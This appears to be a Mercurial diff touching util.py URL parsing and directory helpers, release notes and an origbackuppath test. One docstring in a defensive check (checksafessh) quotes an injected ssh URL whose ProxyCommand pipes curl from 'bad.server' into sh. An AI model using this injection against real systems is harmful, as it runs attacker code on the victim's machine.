2770 2770 self.scheme = 'bundle'
2771 2771 path = path[7:]
2772 2772 if path.startswith('//'):
2773 2773 path = path[2:]
2774 2774 self.path = path
2775 2775 return
2776 2776
2777 2777 if self._matchscheme(path):
2778 2778 parts = path.split(':', 1)
2779 2779 if parts[0]:
2780 2780 self.scheme, path = parts
2781 2781 self._localpath = False
2782 2782
2783 2783 if not path:
2784 2784 path = None
2785 2785 if self._localpath:
2786 2786 self.path = ''
2787 2787 return
2788 2788 else:
2789 2789 if self._localpath:
2790 2790 self.path = path
2791 2791 return
2792 2792
2793 2793 if parsequery and '?' in path:
2794 2794 path, self.query = path.split('?', 1)
2795 2795 if not path:
2796 2796 path = None
2797 2797 if not self.query:
2798 2798 self.query = None
2799 2799
2800 2800 # // is required to specify a host/authority
2801 2801 if path and path.startswith('//'):
2802 2802 parts = path[2:].split('/', 1)
2803 2803 if len(parts) > 1:
2804 2804 self.host, path = parts
2805 2805 else:
2806 2806 self.host = parts[0]
2807 2807 path = None
2808 2808 if not self.host:
2809 2809 self.host = None
2810 2810 # path of file:///d is /d
2811 2811 # path of file:///d:/ is d:/, not /d:/
2812 2812 if path and not hasdriveletter(path):
2813 2813 path = '/' + path
2814 2814
2815 2815 if self.host and '@' in self.host:
2816 2816 self.user, self.host = self.host.rsplit('@', 1)
2817 2817 if ':' in self.user:
2818 2818 self.user, self.passwd = self.user.split(':', 1)
2819 2819 if not self.host:
2820 2820 self.host = None
2821 2821
2822 2822 # Don't split on colons in IPv6 addresses without ports
2823 2823 if (self.host and ':' in self.host and
2824 2824 not (self.host.startswith('[') and self.host.endswith(']'))):
2825 2825 self._hostport = self.host
2826 2826 self.host, self.port = self.host.rsplit(':', 1)
2827 2827 if not self.host:
2828 2828 self.host = None
2829 2829
2830 2830 if (self.host and self.scheme == 'file' and
2831 2831 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2832 2832 raise error.Abort(_('file:// URLs can only refer to localhost'))
2833 2833
2834 2834 self.path = path
2835 2835
2836 2836 # leave the query string escaped
2837 2837 for a in ('user', 'passwd', 'host', 'port',
2838 2838 'path', 'fragment'):
2839 2839 v = getattr(self, a)
2840 2840 if v is not None:
2841 2841 setattr(self, a, urlreq.unquote(v))
2842 2842
2843 2843 @encoding.strmethod
2844 2844 def __repr__(self):
2845 2845 attrs = []
2846 2846 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2847 2847 'query', 'fragment'):
2848 2848 v = getattr(self, a)
2849 2849 if v is not None:
2850 2850 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2851 2851 return '<url %s>' % ', '.join(attrs)
2852 2852
2853 2853 def __bytes__(self):
2854 2854 r"""Join the URL's components back into a URL string.
2855 2855
2856 2856 Examples:
2857 2857
2858 2858 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2859 2859 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2860 2860 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2861 2861 'http://user:pw@host:80/?foo=bar&baz=42'
2862 2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2863 2863 'http://user:pw@host:80/?foo=bar%3dbaz'
2864 2864 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2865 2865 'ssh://user:pw@[::1]:2200//home/joe#'
2866 2866 >>> bytes(url(b'http://localhost:80//'))
2867 2867 'http://localhost:80//'
2868 2868 >>> bytes(url(b'http://localhost:80/'))
2869 2869 'http://localhost:80/'
2870 2870 >>> bytes(url(b'http://localhost:80'))
2871 2871 'http://localhost:80/'
2872 2872 >>> bytes(url(b'bundle:foo'))
2873 2873 'bundle:foo'
2874 2874 >>> bytes(url(b'bundle://../foo'))
2875 2875 'bundle:../foo'
2876 2876 >>> bytes(url(b'path'))
2877 2877 'path'
2878 2878 >>> bytes(url(b'file:///tmp/foo/bar'))
2879 2879 'file:///tmp/foo/bar'
2880 2880 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2881 2881 'file:///c:/tmp/foo/bar'
2882 2882 >>> print(url(br'bundle:foo\bar'))
2883 2883 bundle:foo\bar
2884 2884 >>> print(url(br'file:///D:\data\hg'))
2885 2885 file:///D:\data\hg
2886 2886 """
2887 2887 if self._localpath:
2888 2888 s = self.path
2889 2889 if self.scheme == 'bundle':
2890 2890 s = 'bundle:' + s
2891 2891 if self.fragment:
2892 2892 s += '#' + self.fragment
2893 2893 return s
2894 2894
2895 2895 s = self.scheme + ':'
2896 2896 if self.user or self.passwd or self.host:
2897 2897 s += '//'
2898 2898 elif self.scheme and (not self.path or self.path.startswith('/')
2899 2899 or hasdriveletter(self.path)):
2900 2900 s += '//'
2901 2901 if hasdriveletter(self.path):
2902 2902 s += '/'
2903 2903 if self.user:
2904 2904 s += urlreq.quote(self.user, safe=self._safechars)
2905 2905 if self.passwd:
2906 2906 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2907 2907 if self.user or self.passwd:
2908 2908 s += '@'
2909 2909 if self.host:
2910 2910 if not (self.host.startswith('[') and self.host.endswith(']')):
2911 2911 s += urlreq.quote(self.host)
2912 2912 else:
2913 2913 s += self.host
2914 2914 if self.port:
2915 2915 s += ':' + urlreq.quote(self.port)
2916 2916 if self.host:
2917 2917 s += '/'
2918 2918 if self.path:
2919 2919 # TODO: similar to the query string, we should not unescape the
2920 2920 # path when we store it, the path might contain '%2f' = '/',
2921 2921 # which we should *not* escape.
2922 2922 s += urlreq.quote(self.path, safe=self._safepchars)
2923 2923 if self.query:
2924 2924 # we store the query in escaped form.
2925 2925 s += '?' + self.query
2926 2926 if self.fragment is not None:
2927 2927 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2928 2928 return s
2929 2929
2930 2930 __str__ = encoding.strmethod(__bytes__)
2931 2931
2932 2932 def authinfo(self):
2933 2933 user, passwd = self.user, self.passwd
2934 2934 try:
2935 2935 self.user, self.passwd = None, None
2936 2936 s = bytes(self)
2937 2937 finally:
2938 2938 self.user, self.passwd = user, passwd
2939 2939 if not self.user:
2940 2940 return (s, None)
2941 2941 # authinfo[1] is passed to urllib2 password manager, and its
2942 2942 # URIs must not contain credentials. The host is passed in the
2943 2943 # URIs list because Python < 2.4.3 uses only that to search for
2944 2944 # a password.
2945 2945 return (s, (None, (s, self.host),
2946 2946 self.user, self.passwd or ''))
2947 2947
2948 2948 def isabs(self):
2949 2949 if self.scheme and self.scheme != 'file':
2950 2950 return True # remote URL
2951 2951 if hasdriveletter(self.path):
2952 2952 return True # absolute for our purposes - can't be joined()
2953 2953 if self.path.startswith(br'\\'):
2954 2954 return True # Windows UNC path
2955 2955 if self.path.startswith('/'):
2956 2956 return True # POSIX-style
2957 2957 return False
2958 2958
2959 2959 def localpath(self):
2960 2960 if self.scheme == 'file' or self.scheme == 'bundle':
2961 2961 path = self.path or '/'
2962 2962 # For Windows, we need to promote hosts containing drive
2963 2963 # letters to paths with drive letters.
2964 2964 if hasdriveletter(self._hostport):
2965 2965 path = self._hostport + '/' + self.path
2966 2966 elif (self.host is not None and self.path
2967 2967 and not hasdriveletter(path)):
2968 2968 path = '/' + path
2969 2969 return path
2970 2970 return self._origpath
2971 2971
2972 2972 def islocal(self):
2973 2973 '''whether localpath will return something that posixfile can open'''
2974 2974 return (not self.scheme or self.scheme == 'file'
2975 2975 or self.scheme == 'bundle')
2976 2976
2977 2977 def hasscheme(path):
2978 2978 return bool(url(path).scheme)
2979 2979
2980 2980 def hasdriveletter(path):
2981 2981 return path and path[1:2] == ':' and path[0:1].isalpha()
2982 2982
2983 2983 def urllocalpath(path):
2984 2984 return url(path, parsequery=False, parsefragment=False).localpath()
2985 2985
2986 2986 def checksafessh(path):
2987 2987 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2988 2988
2989 2989 This is a sanity check for ssh urls. ssh will parse the first item as
2990 2990 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2991 2991 Let's prevent these potentially exploited urls entirely and warn the
2992 2992 user.
2993 2993
2994 2994 Raises an error.Abort when the url is unsafe.
2995 2995 """
2996 2996 path = urlreq.unquote(path)
2997 2997 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2998 2998 raise error.Abort(_('potentially unsafe url: %r') %
2999 2999 (pycompat.bytestr(path),))
3000 3000
3001 3001 def hidepassword(u):
3002 3002 '''hide user credential in a url string'''
3003 3003 u = url(u)
3004 3004 if u.passwd:
3005 3005 u.passwd = '***'
3006 3006 return bytes(u)
3007 3007
3008 3008 def removeauth(u):
3009 3009 '''remove all authentication information from a url string'''
3010 3010 u = url(u)
3011 3011 u.user = u.passwd = None
3012 3012 return bytes(u)
3013 3013
3014 3014 timecount = unitcountfn(
3015 3015 (1, 1e3, _('%.0f s')),
3016 3016 (100, 1, _('%.1f s')),
3017 3017 (10, 1, _('%.2f s')),
3018 3018 (1, 1, _('%.3f s')),
3019 3019 (100, 0.001, _('%.1f ms')),
3020 3020 (10, 0.001, _('%.2f ms')),
3021 3021 (1, 0.001, _('%.3f ms')),
3022 3022 (100, 0.000001, _('%.1f us')),
3023 3023 (10, 0.000001, _('%.2f us')),
3024 3024 (1, 0.000001, _('%.3f us')),
3025 3025 (100, 0.000000001, _('%.1f ns')),
3026 3026 (10, 0.000000001, _('%.2f ns')),
3027 3027 (1, 0.000000001, _('%.3f ns')),
3028 3028 )
3029 3029
3030 3030 @attr.s
3031 3031 class timedcmstats(object):
3032 3032 """Stats information produced by the timedcm context manager on entering."""
3033 3033
3034 3034 # the starting value of the timer as a float (meaning and resolution are
3035 3035 # platform dependent, see util.timer)
3036 3036 start = attr.ib(default=attr.Factory(lambda: timer()))
3037 3037 # the number of seconds as a floating point value; starts at 0, updated when
3038 3038 # the context is exited.
3039 3039 elapsed = attr.ib(default=0)
3040 3040 # the number of nested timedcm context managers.
3041 3041 level = attr.ib(default=1)
3042 3042
3043 3043 def __bytes__(self):
3044 3044 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3045 3045
3046 3046 __str__ = encoding.strmethod(__bytes__)
3047 3047
3048 3048 @contextlib.contextmanager
3049 3049 def timedcm(whencefmt, *whenceargs):
3050 3050 """A context manager that produces timing information for a given context.
3051 3051
3052 3052 On entering, a timedcmstats instance is produced.
3053 3053
3054 3054 This context manager is reentrant.
3055 3055
3056 3056 """
3057 3057 # track nested context managers
3058 3058 timedcm._nested += 1
3059 3059 timing_stats = timedcmstats(level=timedcm._nested)
3060 3060 try:
3061 3061 with tracing.log(whencefmt, *whenceargs):
3062 3062 yield timing_stats
3063 3063 finally:
3064 3064 timing_stats.elapsed = timer() - timing_stats.start
3065 3065 timedcm._nested -= 1
3066 3066
3067 3067 timedcm._nested = 0
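# Illustrative sketch: time a block; the stats object is filled in when
# the context exits:
#
# with timedcm(b'example %s', b'outer') as stats:
#     sum(range(10000))
# print(bytes(stats)) # e.g. '1.23 ms'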
3068 3068
3069 3069 def timed(func):
3070 3070 '''Report the execution time of a function call to stderr.
3071 3071
3072 3072 During development, use as a decorator when you need to measure
3073 3073 the cost of a function, e.g. as follows:
3074 3074
3075 3075 @util.timed
3076 3076 def foo(a, b, c):
3077 3077 pass
3078 3078 '''
3079 3079
3080 3080 def wrapper(*args, **kwargs):
3081 3081 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3082 3082 result = func(*args, **kwargs)
3083 3083 stderr = procutil.stderr
3084 3084 stderr.write('%s%s: %s\n' % (
3085 3085 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3086 3086 time_stats))
3087 3087 return result
3088 3088 return wrapper
3089 3089
3090 3090 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3091 3091 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3092 3092
3093 3093 def sizetoint(s):
3094 3094 '''Convert a space specifier to a byte count.
3095 3095
3096 3096 >>> sizetoint(b'30')
3097 3097 30
3098 3098 >>> sizetoint(b'2.2kb')
3099 3099 2252
3100 3100 >>> sizetoint(b'6M')
3101 3101 6291456
3102 3102 '''
3103 3103 t = s.strip().lower()
3104 3104 try:
3105 3105 for k, u in _sizeunits:
3106 3106 if t.endswith(k):
3107 3107 return int(float(t[:-len(k)]) * u)
3108 3108 return int(t)
3109 3109 except ValueError:
3110 3110 raise error.ParseError(_("couldn't parse size: %s") % s)
3111 3111
3112 3112 class hooks(object):
3113 3113 '''A collection of hook functions that can be used to extend a
3114 3114 function's behavior. Hooks are called in lexicographic order,
3115 3115 based on the names of their sources.'''
3116 3116
3117 3117 def __init__(self):
3118 3118 self._hooks = []
3119 3119
3120 3120 def add(self, source, hook):
3121 3121 self._hooks.append((source, hook))
3122 3122
3123 3123 def __call__(self, *args):
3124 3124 self._hooks.sort(key=lambda x: x[0])
3125 3125 results = []
3126 3126 for source, hook in self._hooks:
3127 3127 results.append(hook(*args))
3128 3128 return results
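# Illustrative sketch: hooks fire sorted by source name, not by
# registration order:
#
# >>> h = hooks()
# >>> h.add(b'zzz', lambda x: x + 1)
# >>> h.add(b'aaa', lambda x: x * 2)
# >>> h(10)
# [20, 11]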
3129 3129
3130 3130 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3131 3131 '''Yields lines for a nicely formatted stacktrace.
3132 3132 Skips the 'skip' last entries, then returns the last 'depth' entries.
3133 3133 Each file+linenumber is formatted according to fileline.
3134 3134 Each line is formatted according to line.
3135 3135 If line is None, it yields:
3136 3136 length of longest filepath+line number,
3137 3137 filepath+linenumber,
3138 3138 function
3139 3139
3140 3140 Not to be used in production code, but very convenient while developing.
3141 3141 '''
3142 3142 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3143 3143 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3144 3144 ][-depth:]
3145 3145 if entries:
3146 3146 fnmax = max(len(entry[0]) for entry in entries)
3147 3147 for fnln, func in entries:
3148 3148 if line is None:
3149 3149 yield (fnmax, fnln, func)
3150 3150 else:
3151 3151 yield line % (fnmax, fnln, func)
3152 3152
3153 3153 def debugstacktrace(msg='stacktrace', skip=0,
3154 3154 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3155 3155 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3156 3156 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3157 3157 By default it will flush stdout first.
3158 3158 It can be used everywhere and intentionally does not require an ui object.
3159 3159 Not to be used in production code, but very convenient while developing.
3160 3160 '''
3161 3161 if otherf:
3162 3162 otherf.flush()
3163 3163 f.write('%s at:\n' % msg.rstrip())
3164 3164 for line in getstackframes(skip + 1, depth=depth):
3165 3165 f.write(line)
3166 3166 f.flush()
3167 3167
3168 3168 class dirs(object):
3169 3169 '''a multiset of directory names from a dirstate or manifest'''
3170 3170
3171 3171 def __init__(self, map, skip=None):
3172 3172 self._dirs = {}
3173 3173 addpath = self.addpath
3174 3174 if safehasattr(map, 'iteritems') and skip is not None:
3175 3175 for f, s in map.iteritems():
3176 3176 if s[0] != skip:
3177 3177 addpath(f)
3178 3178 else:
3179 3179 for f in map:
3180 3180 addpath(f)
3181 3181
3182 3182 def addpath(self, path):
3183 3183 dirs = self._dirs
3184 3184 for base in finddirs(path):
3185 3185 if base in dirs:
3186 3186 dirs[base] += 1
3187 3187 return
3188 3188 dirs[base] = 1
3189 3189
3190 3190 def delpath(self, path):
3191 3191 dirs = self._dirs
3192 3192 for base in finddirs(path):
3193 3193 if dirs[base] > 1:
3194 3194 dirs[base] -= 1
3195 3195 return
3196 3196 del dirs[base]
3197 3197
3198 3198 def __iter__(self):
3199 3199 return iter(self._dirs)
3200 3200
3201 3201 def __contains__(self, d):
3202 3202 return d in self._dirs
3203 3203
3204 3204 if safehasattr(parsers, 'dirs'):
3205 3205 dirs = parsers.dirs
3206 3206
3207 3207 def finddirs(path):
3208 3208 pos = path.rfind('/')
3209 3209 while pos != -1:
3210 3210 yield path[:pos]
3211 3211 pos = path.rfind('/', 0, pos)
3212 yield ''
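# Illustrative sketch: with the line added above, every ancestor
# directory is produced, ending with the root (the empty string):
#
# >>> list(finddirs(b'a/b/c'))
# ['a/b', 'a', '']
# >>> list(finddirs(b'file-at-root'))
# ['']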
3212 3213
3213 3214
3214 3215 # convenient shortcut
3215 3216 dst = debugstacktrace
3216 3217
3217 3218 def safename(f, tag, ctx, others=None):
3218 3219 """
3219 3220 Generate a name that is safe to rename f to in the given context.
3220 3221
3221 3222 f: filename to rename
3222 3223 tag: a string tag that will be included in the new name
3223 3224 ctx: a context, in which the new name must not exist
3224 3225 others: a set of other filenames that the new name must not be in
3225 3226
3226 3227 Returns a file name of the form oldname~tag[~number] which does not exist
3227 3228 in the provided context and is not in the set of other names.
3228 3229 """
3229 3230 if others is None:
3230 3231 others = set()
3231 3232
3232 3233 fn = '%s~%s' % (f, tag)
3233 3234 if fn not in ctx and fn not in others:
3234 3235 return fn
3235 3236 for n in itertools.count(1):
3236 3237 fn = '%s~%s~%s' % (f, tag, n)
3237 3238 if fn not in ctx and fn not in others:
3238 3239 return fn
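# Illustrative sketch: assuming b'foo~dest' already exists in ctx, the
# numbered fallback is chosen:
#
# safename(b'foo', b'dest', ctx) -> b'foo~dest~1'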
3239 3240
3240 3241 def readexactly(stream, n):
3241 3242 '''read n bytes from stream.read and abort if less was available'''
3242 3243 s = stream.read(n)
3243 3244 if len(s) < n:
3244 3245 raise error.Abort(_("stream ended unexpectedly"
3245 3246 " (got %d bytes, expected %d)")
3246 3247 % (len(s), n))
3247 3248 return s
3248 3249
3249 3250 def uvarintencode(value):
3250 3251 """Encode an unsigned integer value to a varint.
3251 3252
3252 3253 A varint is a variable length integer of 1 or more bytes. Each byte
3253 3254 except the last has the most significant bit set. The lower 7 bits of
3254 3255 each byte store the 2's complement representation, least significant group
3255 3256 first.
3256 3257
3257 3258 >>> uvarintencode(0)
3258 3259 '\\x00'
3259 3260 >>> uvarintencode(1)
3260 3261 '\\x01'
3261 3262 >>> uvarintencode(127)
3262 3263 '\\x7f'
3263 3264 >>> uvarintencode(1337)
3264 3265 '\\xb9\\n'
3265 3266 >>> uvarintencode(65536)
3266 3267 '\\x80\\x80\\x04'
3267 3268 >>> uvarintencode(-1)
3268 3269 Traceback (most recent call last):
3269 3270 ...
3270 3271 ProgrammingError: negative value for uvarint: -1
3271 3272 """
3272 3273 if value < 0:
3273 3274 raise error.ProgrammingError('negative value for uvarint: %d'
3274 3275 % value)
3275 3276 bits = value & 0x7f
3276 3277 value >>= 7
3277 3278 bytes = []
3278 3279 while value:
3279 3280 bytes.append(pycompat.bytechr(0x80 | bits))
3280 3281 bits = value & 0x7f
3281 3282 value >>= 7
3282 3283 bytes.append(pycompat.bytechr(bits))
3283 3284
3284 3285 return ''.join(bytes)
3285 3286
3286 3287 def uvarintdecodestream(fh):
3287 3288 """Decode an unsigned variable length integer from a stream.
3288 3289
3289 3290 The passed argument is anything that has a ``.read(N)`` method.
3290 3291
3291 3292 >>> try:
3292 3293 ... from StringIO import StringIO as BytesIO
3293 3294 ... except ImportError:
3294 3295 ... from io import BytesIO
3295 3296 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3296 3297 0
3297 3298 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3298 3299 1
3299 3300 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3300 3301 127
3301 3302 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3302 3303 1337
3303 3304 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3304 3305 65536
3305 3306 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3306 3307 Traceback (most recent call last):
3307 3308 ...
3308 3309 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3309 3310 """
3310 3311 result = 0
3311 3312 shift = 0
3312 3313 while True:
3313 3314 byte = ord(readexactly(fh, 1))
3314 3315 result |= ((byte & 0x7f) << shift)
3315 3316 if not (byte & 0x80):
3316 3317 return result
3317 3318 shift += 7
@@ -1,34 +1,37
1 1 == New Features ==
2 2
3 3 * New config `commands.commit.post-status` shows status after successful
4 4 commit.
5 5
6 6
7 7 == New Experimental Features ==
8 8
9 9 * New config `experimental.log.topo` makes `hg log -G` use
10 10 topological sorting. This is especially useful for aliases since it
11 11 lets the alias accept an `-r` option while still using topological
12 12 sorting with or without the `-r` (unlike if you use the `sort(...,
13 13 topo)` revset).
14 14
15 15
16 16 == Bug Fixes ==
17 17
18 18
19 19 == Backwards Compatibility Changes ==
20 20
21 21 * Removed (experimental) support for log graph lines mixing
22 22 parent/grandparent styles. Setting
23 23 e.g. `experimental.graphstyle.parent = !` and
24 24 `experimental.graphstyle.grandparent = 3.` would use `!` for the
25 25 first three lines of the graph and then `.`. This is no longer
26 26 supported.
27 27
28 28
29 29 == Internal API Changes ==
30 30
31 31 * Matchers are no longer iterable. Use `match.files()` instead.
32 32
33 33 * `match.visitdir()` and `match.visitchildrenset()` now expect the
34 34 empty string instead of '.' to indicate the root directory.
35
36 * `util.dirs()` and `util.finddirs()` now include an entry for the
37 root directory (empty string).
@@ -1,136 +1,137
1 1 Set up repo
2 2
3 3 $ cat << EOF >> $HGRCPATH
4 4 > [ui]
5 5 > origbackuppath=.hg/origbackups
6 6 > [merge]
7 7 > checkunknown=warn
8 8 > EOF
9 9 $ hg init repo
10 10 $ cd repo
11 11 $ echo base > base
12 12 $ hg add base
13 13 $ hg commit -m "base"
14 14
15 15 Make a dir named b that contains a file, and a file named d
16 16
17 17 $ mkdir -p b
18 18 $ echo c1 > b/c
19 19 $ echo d1 > d
20 20 $ hg add b/c d
21 21 $ hg commit -m "c1"
22 22 $ hg bookmark c1
23 23
24 24 Perform an update that causes b/c to be backed up
25 25
26 26 $ hg up -q 0
27 27 $ mkdir -p b
28 28 $ echo c2 > b/c
29 29 $ hg up --verbose c1
30 30 resolving manifests
31 31 b/c: replacing untracked file
32 32 getting b/c
33 33 creating directory: $TESTTMP/repo/.hg/origbackups/b
34 34 getting d
35 35 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
36 36 (activating bookmark c1)
37 37 $ test -f .hg/origbackups/b/c
38 38
39 39 Make files named b and d
40 40
41 41 $ hg up -q 0
42 42 $ echo b1 > b
43 43 $ echo d2 > d
44 44 $ hg add b d
45 45 $ hg commit -m b1
46 46 created new head
47 47 $ hg bookmark b1
48 48
49 49 Perform an update that causes b to be backed up - it should replace the backup b dir
50 50
51 51 $ hg up -q 0
52 52 $ echo b2 > b
53 53 $ hg up --verbose b1
54 54 resolving manifests
55 55 b: replacing untracked file
56 56 getting b
57 57 removing conflicting directory: $TESTTMP/repo/.hg/origbackups/b
58 58 getting d
59 59 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
60 60 (activating bookmark b1)
61 61 $ test -f .hg/origbackups/b
62 62
63 63 Perform an update that causes b/c to be backed up again - it should replace the backup b file
64 64
65 65 $ hg up -q 0
66 66 $ mkdir b
67 67 $ echo c3 > b/c
68 68 $ hg up --verbose c1
69 69 resolving manifests
70 70 b/c: replacing untracked file
71 71 getting b/c
72 72 creating directory: $TESTTMP/repo/.hg/origbackups/b
73 73 removing conflicting file: $TESTTMP/repo/.hg/origbackups/b
74 74 getting d
75 75 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
76 76 (activating bookmark c1)
77 77 $ test -d .hg/origbackups/b
78 78
79 79 Cause two symlinks to be backed up that point to a valid location from the backup dir
80 80
81 81 $ hg up -q 0
82 82 $ mkdir ../sym-link-target
83 83 #if symlink
84 84 $ ln -s ../../../sym-link-target b
85 85 $ ln -s ../../../sym-link-target d
86 86 #else
87 87 $ touch b d
88 88 #endif
89 89 $ hg up b1
90 90 b: replacing untracked file
91 91 d: replacing untracked file
92 92 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
93 93 (activating bookmark b1)
94 94 #if symlink
95 95 $ readlink.py .hg/origbackups/b
96 96 .hg/origbackups/b -> ../../../sym-link-target
97 97 #endif
98 98
99 99 Perform an update that causes b/c and d to be backed up again - b/c should not go into the target dir
100 100
101 101 $ hg up -q 0
102 102 $ mkdir b
103 103 $ echo c4 > b/c
104 104 $ echo d3 > d
105 105 $ hg up --verbose c1
106 106 resolving manifests
107 107 b/c: replacing untracked file
108 108 d: replacing untracked file
109 109 getting b/c
110 110 creating directory: $TESTTMP/repo/.hg/origbackups/b
111 111 removing conflicting file: $TESTTMP/repo/.hg/origbackups/b
112 112 getting d
113 113 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
114 114 (activating bookmark c1)
115 115 $ cat .hg/origbackups/b/c
116 116 c4
117 117 $ cat .hg/origbackups/d
118 118 d3
119 119 $ ls ../sym-link-target
120 120
121 121 Incorrectly configure origbackuppath to be under a file
122 122
123 123 $ echo data > .hg/badorigbackups
124 124 $ hg up -q 0
125 125 $ mkdir b
126 126 $ echo c5 > b/c
127 127 $ hg up --verbose c1 --config ui.origbackuppath=.hg/badorigbackups
128 128 resolving manifests
129 129 b/c: replacing untracked file
130 130 getting b/c
131 131 creating directory: $TESTTMP/repo/.hg/badorigbackups/b
132 abort: $ENOTDIR$: *$TESTTMP/repo/.hg/badorigbackups/b* (glob)
133 [255]
134 $ cat .hg/badorigbackups
135 data
136
132 removing conflicting file: $TESTTMP/repo/.hg/badorigbackups
133 getting d
134 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
135 (activating bookmark c1)
136 $ ls .hg/badorigbackups/b
137 c